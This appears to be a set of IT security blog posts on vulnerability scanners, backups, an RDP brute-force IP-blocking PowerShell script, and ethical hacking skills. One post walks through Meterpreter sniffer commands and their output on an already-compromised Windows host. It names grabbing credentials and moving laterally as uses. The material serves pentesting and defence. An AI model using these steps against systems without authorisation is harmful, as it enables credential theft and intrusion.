Automated vulnerability scanners produce a lot of false-positive reports. This creates a lot of work for security analysts, and some of them hate the tools. Are vulnerability scanners broken?

Not necessarily. An automated vulnerability scanner still helps a lot to identify weaknesses in a system or OS, and it is cheaper than a penetration test.

Security is an ongoing process. An automated scanner helps raise the security bar of any system, but it should not replace penetration testing. Keep running the automated tool, then bring in a penetration tester: the pentester can focus on the hard-to-find weaknesses because you already found the easy ones with the vulnerability scanner. Keep in mind that a scanner only reports what its signatures recognise, so every finding still has to be validated before it is counted as real, and a clean scan does not mean the system is secure.

So, are vulnerability scanners broken? No, they keep helping to protect the data.

 

How is it possible that a lot of companies operate without a good backup? The risk is high. Very often, at the moment you least expect it, you get hit, and then the only solution you have is to restore from backup.

These are some examples:

1. A user is surfing the internet and hits a site that infects his or her machine. The malware is a crypto-locker. Terrible: it begins to encrypt every network drive mapped on that computer, and some of these families also delete the Volume Shadow Copies so the files cannot be rolled back. You have two options: restore from backup or pay the ransom.

2. This is very common: users show up at 7:30 a.m. and the accounting or file server is not working. You check and discover the hard drive is failing, or the whole OS is corrupted including the data, etc. Especially with failed hardware, you need to restore from backup.

In the previous examples, what happens if you do not have a backup? Prepare your resume; very soon you will begin to look for a job, and the company will lose money.

Now, what happens if you have a backup? You are happy, you begin to restore the data or the server, and you discover the backup is not working right and you cannot restore anything. Nobody ever tested the backups.

Now we can say: Houston, we've got a problem!

I saw other companies that lost between 30 GB and 1 TB of data and restored it in a couple of hours, very quickly. Good. Why? Because they implemented a good backup solution according to their needs.

Types of Backups: Image or files.

Not all backups are the same; it depends on many factors. If you have servers that need to restore complex applications, then you need a backup that creates images of the machine.

For file servers it is different: you just need to back up the files or data, so in case the files become corrupted, encrypted or deleted you can restore them very easily, even during production hours.

Whatever you choose, a backup only counts once a restore has actually been tested from it, and a copy that sits on a drive mapped to the workstations is exposed to the same crypto-locker as the originals, so keep at least one copy offline or otherwise unreachable from the network.

There are different strategies to protect company data or servers in case of disaster. You know your company and environment; like people say: choose wisely!

 

Meterpreter lets you run a packet sniffer through an extension, and something very important is that the capture is never saved on the target's hard drive: the packets are held in memory by the Meterpreter process and only leave the target when you download them. It works on Windows targets and in practice needs administrative privileges on the target. I will explain how to enable the packet sniffer in Metasploit with Meterpreter.

Let's consider that you are already connected through some exploit with Meterpreter running; then you type the following:

### load the sniffer extension

meterpreter > use sniffer

Loading extension sniffer...success.

meterpreter > ?

....

Sniffer Commands
================

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data to PCAP file
    sniffer_interfaces  Enumerate all sniffable network interfaces
    sniffer_release     Free captured packets on a specific interface instead of downloading them
    sniffer_start       Start packet capture on a specific interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet capture on a specific interface

### Find out which interface to use to sniff the traffic

meterpreter > sniffer_interfaces

1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Realtek PCIe GBE Family Controller' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

### You can see that interface 2 is the network one; we will start capturing on that interface:

meterpreter > sniffer_start 2

[*] Capture started on interface 2 (50000 packet buffer)

### Stop the sniffer

meterpreter > sniffer_stop 2

[*] Capture stopped on interface 2
[*] There are 3099 packets (1365925 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'

### Download the data

meterpreter > sniffer_dump 2 /root/raul.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 3099 packets (1427905 bytes)
[*] Downloaded 036% (524288/1427905)...
[*] Downloaded 073% (1048576/1427905)...
[*] Downloaded 100% (1427905/1427905)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /root/raul.pcap

Then I was able to open the file raul.pcap with Wireshark.

Summary

Where can you use this? You can use it to grab credentials and move laterally on the network if you are pentesting it, or to troubleshoot any computer problem on the network. Two things to keep in mind: the PCAP is written on the attacker's machine (/root/raul.pcap here), and the capture buffer holds 50000 packets per interface, so on a busy link dump it regularly rather than leaving it running for hours. On a switched network the capture only shows traffic to and from the compromised host plus broadcast traffic, so choose the host accordingly.
 
 
 
 

Several times you check the Security logs and notice that some IP addresses are trying to guess a username and password for the remote desktop (RDP).

This script is for Windows 2008/2008R2 and Windows 7.

Because we want to block and stop those attacks, a lot of security analysts block the IP address in the firewall (Windows or appliance). That is good, but there is a big chance that another IP shows up attacking while the analyst is sleeping or doing something else.

This script reads the Windows Security log looking for event ID 4625 (an account failed to log on) in the last 5 minutes, strips everything but the source IP addresses, removes the duplicates and at the end writes the IP addresses into the Windows Firewall to block them. Note that this blocks the whole IP, not just the RDP port.

The next time you run the script it deletes all the IP addresses the script previously wrote into the firewall and begins the process again.

If there is no new IP address to add, the script just ends.

This script is basic. No port is involved, just IP addresses, and if a legitimate user types a wrong password, his or her IP will be blocked the next time the script runs. Events whose Source Network Address is "-" (local logons and failures where no address was recorded) are discarded. If you put this in production, at least add a threshold (block only after several failures) and an allow list of addresses that must never be blocked, such as your management hosts.

To run the script every 5 minutes you need to create a scheduled task on the Windows machine that runs it every 5 minutes.

If you want to copy the script, please copy and paste it into Notepad first to make sure the code is clean; otherwise you will get some errors and end up troubleshooting.

If you need custom code please contact me and I will be glad to help you for a small fee.

This is the script:

 

 

#### THIS LINE CLEANS ANY FIREWALL RULE THAT WAS CREATED TO BLOCK IP ADDRESSES BY THIS SCRIPT. I HAVE TO PUT IT HERE TO AVOID FILLING UP THE
#### FIREWALL WITH RULES AND TO ELIMINATE THE ADDRESSES WE NO LONGER NEED TO BLOCK

netsh advfirewall firewall delete rule name="Block IP Attacker"


### This collects the failed logons (event ID 4625) of the last 5 minutes. If you want to change the window, replace -5 with the number of minutes you want.

Get-EventLog -LogName Security -After (Get-Date).AddMinutes(-5) | Where-Object { $_.EventID -eq 4625 } | Format-List Message | Out-File result.txt -Width 4096


### This finds the "Source Network Address:" line of every event message

Get-Content result.txt | Select-String -Pattern "Source Network Address:" | Out-File result2.txt


### CLEAN THE OUTPUT: remove the label and the "-" placeholder that the log uses when no source address was recorded

Get-Content result2.txt | ForEach-Object { $_ -replace "Source Network Address:", "" } | ForEach-Object { $_ -replace "-", "" } | Out-File result3.txt

Get-Content result3.txt | ForEach-Object { $_.Trim() } | Out-File result4.txt

Get-Content result4.txt | Where-Object { $_ -ne "" } > result5.txt


### REMOVE DUPLICATE IP addresses

Get-Content result5.txt | Sort-Object -Unique | Out-File result6.txt

Get-Content result6.txt | Where-Object { $_ -ne "" } > iptoblock.txt

Get-Content iptoblock.txt


### CREATE THE FIREWALL RULES. IF THERE WAS NO ATTACK THE SCRIPT EXITS and prints "No New Incidents, I will sleep waiting for new attacks".
### The file is read back instead of checking its size, because a file written by Out-File can contain a byte-order mark even when there is no content, so its length is not zero.

$c = Get-Content iptoblock.txt | Where-Object { $_ -ne "" }

if (-not $c)
{
    Write-Host "No New Incidents, I will sleep waiting for new attacks"
    Exit
}
else
{
    foreach ($ip in $c) {
        ### interfacetype=any is the valid netsh parameter; "interface=any" is not accepted by netsh
        netsh advfirewall firewall add rule name="Block IP Attacker" dir=in interfacetype=any action=block remoteip="$ip"
    }
}


### This tells you the script finished; you can comment this line out

Write-Host "WORK DONE"
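The following is an added example, not the script from this page, showing how a practitioner would harden the same idea: it reads the IpAddress field from the 4625 event XML instead of parsing the message text, blocks an address only after a number of failures, skips an allow list, and writes a single firewall rule limited to the RDP port (the page's script blocks the whole IP). The default port 3389, the 5-failure threshold, the constructed allow-list address 10.0.0.5, the rule name "Block RDP Attacker" and the script path in the scheduling comment are all assumptions made for this example and do not come from the page.

```powershell
# Added example (not the script from this page): threshold-based RDP blocker.
# Assumed for this example: RDP on the default port 3389, a 5-failure threshold,
# an allow list with one constructed management address, and the rule name below.
param(
    [int]$Minutes = 5,
    [int]$Threshold = 5,
    [string[]]$AllowList = @("10.0.0.5"),   # constructed: never block this host
    [string]$RuleName = "Block RDP Attacker"
)

# Return one object per failed logon that carries a source address.
# The IpAddress field is read from the event XML, not from the localized message
# text, so the script works on any Windows display language.
function Get-FailedLogonSources {
    param([int]$Minutes)
    $filter = @{ LogName = "Security"; Id = 4625; StartTime = (Get-Date).AddMinutes(-$Minutes) }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        $data = @{}
        foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        # "-" means the address was not recorded (local logons, and RDP failures
        # rejected before the address is logged); those cannot be blocked by IP
        if ($data["IpAddress"] -and $data["IpAddress"] -ne "-") {
            New-Object PSObject -Property @{
                Ip        = $data["IpAddress"]
                LogonType = $data["LogonType"]       # 3 = network, 10 = RemoteInteractive
                User      = $data["TargetUserName"]
            }
        }
    }
}

# Keep only addresses with at least $Threshold failures that are not on the allow list.
function Select-Offenders {
    param($Sources, [int]$Threshold, [string[]]$AllowList)
    $Sources |
        Group-Object -Property Ip |
        Where-Object { $_.Count -ge $Threshold -and ($AllowList -notcontains $_.Name) } |
        ForEach-Object { $_.Name }
}

# Replace the previous rule on every run so the firewall does not fill up, then
# write a single rule with a comma-separated remoteip list scoped to TCP/3389.
function Set-BlockRule {
    param([string[]]$Ips, [string]$RuleName)
    netsh advfirewall firewall delete rule name="$RuleName" | Out-Null
    if (-not $Ips) {
        Write-Host "No new incidents, nothing to block"
        return
    }
    $list = $Ips -join ","
    netsh advfirewall firewall add rule name="$RuleName" dir=in action=block protocol=TCP localport=3389 remoteip="$list"
    Write-Host "Blocked $($Ips.Count) address(es) on TCP/3389: $list"
}

$sources   = @(Get-FailedLogonSources -Minutes $Minutes)
$offenders = @(Select-Offenders -Sources $sources -Threshold $Threshold -AllowList $AllowList)
Set-BlockRule -Ips $offenders -RuleName $RuleName

# Run it every 5 minutes as SYSTEM (the script path is an assumption):
#   schtasks /create /tn "Block RDP Attacker" /sc minute /mo 5 /ru SYSTEM ^
#     /tr "powershell.exe -ExecutionPolicy Bypass -File C:\scripts\Block-RdpAttacker.ps1"
```

Because the rule is rebuilt on every run from the last $Minutes of events, an address is unblocked automatically once its failures age out of the window; lengthen the window or persist the offender list if you want blocks to last longer than that. A threshold of 5 within 5 minutes still lets a slow attacker through, so tune both values against what you see in your own logs.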

 

 

 

 

 

A lot of people want to be an ethical hacker or penetration tester. It is a very rewarding job, and it also requires a lot of effort. I will describe in this article what knowledge you need if you want to be an ethical hacker. I will not touch the soft skills, only the technical ones.

First, this is not an easy path. It requires perseverance and a lot of self-study, including thinking completely differently from any other technologist (outside the box).

Basic Knowledge

Yes, you need basic knowledge, and it has to be very solid; you do not have the luxury of holes in your basic knowledge.

Knowledge of Windows/Linux OS: you have to be strong in one of them and very proficient in the other. I am not saying you must be able to build a cluster with those servers; I am saying you need the same knowledge a system administrator or system engineer working for an IT services company has (yes, supporting many clients' environments is very different from working in-house at one company).

Network knowledge: yes, you have to know how routing works, TCP/UDP, packets, routers, switches, ARP, firewalls, etc. How will you bypass a firewall if you do not know how it works, or sniff traffic if you do not understand switches?

Programming knowledge: you have to have one language in which you are strong, and if you are going to be a web ethical hacker you have to know more than one. A lot of hackers use Perl and Python.

Specialty Knowledge

This depends on what you want to be good at; you cannot be strong in every specialty, with some exceptions. These are some examples.

Specialty: Attacking Networks. For this you need good knowledge of protocols, routers, switches, firewalls, Wi-Fi, packets, etc.

Specialty: Attacking Systems. This includes a lot of the network material, because you work with packets, etc., plus good knowledge of Windows/Linux and how to escalate privileges to become an administrator on the server or domain.

Specialty: Attacking Web Applications. For this you have to know different web programming languages such as ASP, PHP, Java, etc. You also need good database knowledge; yes, how will you attempt SQL injection when you do not know anything about SQL queries?

Conclusion

A lot of ethical hackers have a mix of skills. They are normally strong in one specialty and a little weaker in the others. In the beginning do not worry about which skills you will end up with; begin to build your skills, and later you will find which of those fields you want to be in, and go for it. Enjoy the whole process.